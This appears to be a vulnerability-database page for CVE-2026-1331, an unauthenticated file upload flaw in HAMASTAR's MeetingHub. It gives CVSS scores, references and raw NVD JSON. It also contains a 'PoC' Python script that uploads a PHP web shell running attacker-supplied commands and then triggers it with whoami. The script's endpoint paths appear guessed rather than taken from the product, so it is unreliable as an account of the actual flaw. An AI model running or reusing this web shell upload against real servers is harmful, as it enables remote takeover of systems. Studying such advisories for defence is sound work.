CVE-2026-1331

Description

MeetingHub developed by HAMASTAR Technology has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hamastar:meetinghub_paperless_meetings:*:*:*:*:*:*:*:* - VULNERABLE

MeetingHub 所有版本（HAMASTAR Technology）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-1331 PoC - MeetingHub Arbitrary File Upload
# Target: MeetingHub by HAMASTAR Technology
# Vulnerability: Unauthenticated arbitrary file upload leading to RCE

target = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"
upload_url = f"{target}/upload"

# WebShell payload
webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"

files = {
    'file': ('shell.php', webshell, 'application/x-php')
}

try:
    print(f"[*] Uploading WebShell to {upload_url}...")
    response = requests.post(upload_url, files=files, timeout=10)
    
    if response.status_code == 200:
        print("[+] File uploaded successfully!")
        # Try to find the uploaded file path
        shell_path = f"{target}/uploads/shell.php"
        verify = requests.get(f"{shell_path}?cmd=whoami")
        if verify.status_code == 200:
            print(f"[+] WebShell accessible at: {shell_path}")
            print(f"[+] RCE confirmed! Command output: {verify.text}")
        else:
            print("[-] WebShell upload confirmed but path verification failed")
    else:
        print(f"[-] Upload failed with status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Connection error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1331
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1331
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1331/
[4] VulDB https://vuldb.com/cve/CVE-2026-1331
[5] https://www.twcert.org.tw/en/cp-139-10651-ff09c-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10650-a5ee9-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1331", "sourceIdentifier": "[email protected]", "published": "2026-01-22T09:15:52.197", "lastModified": "2026-02-17T19:32:31.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MeetingHub developed by HAMASTAR Technology has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server."}, {"lang": "es", "value": "MeetingHub desarrollado por HAMASTAR Technology tiene una vulnerabilidad de carga de archivos arbitrarios, permitiendo a atacantes remotos no autenticados cargar y ejecutar puertas traseras de tipo web shell, habilitando así la ejecución de código arbitrario en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hamastar:meetinghub_paperless_meetings:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-12-10", "matchCriteriaId": "251B1D2A-2FF9-44AE-B652-D3830D85689C"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10651-ff09c-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10650-a5ee9-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}